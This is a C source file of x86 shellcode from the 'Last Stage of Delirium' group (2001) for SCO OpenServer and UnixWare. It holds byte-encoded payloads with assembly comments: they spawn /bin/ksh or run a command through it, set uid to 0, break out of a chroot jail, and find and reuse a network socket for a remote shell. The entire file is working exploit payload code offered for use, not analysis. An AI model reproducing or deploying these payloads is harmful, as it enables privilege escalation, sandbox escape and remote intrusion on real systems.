/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for openserver 5.0.4 unixware 7.0 x86                          #*/

/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 ret,uid=0
mkdir       x050 ret,->path="b..",mode= (each value is valid)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
ioctl       x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
close       x006 ret,fd={0,1,2}
dup         x029 ret,sfd
*/

#if defined(X86) && ( defined(OPENSERVER) || defined(UNIXWARE) )

char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
;

char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x44(%eax),edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command */
;

char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

char chrootcode[]=         /* 40 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x50"             /* movb    $0x50,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xfa"             /* loop    <chrootcode+28>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

#if defined(UNIXWARE)
char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x8b\xd9"             /* movl    %ecx,%ebx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x51"                 /* pushl   %ecx                   */
    "\xb0\x06"             /* movb    $0x06,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x29"             /* movb    $0x29,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf2"             /* loop    <findsckcode+53>       */
;
#endif

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

#define FINDSCKPORTOFS     39
#define BINDSCKPORTOFS     05
#define SCO

#endif
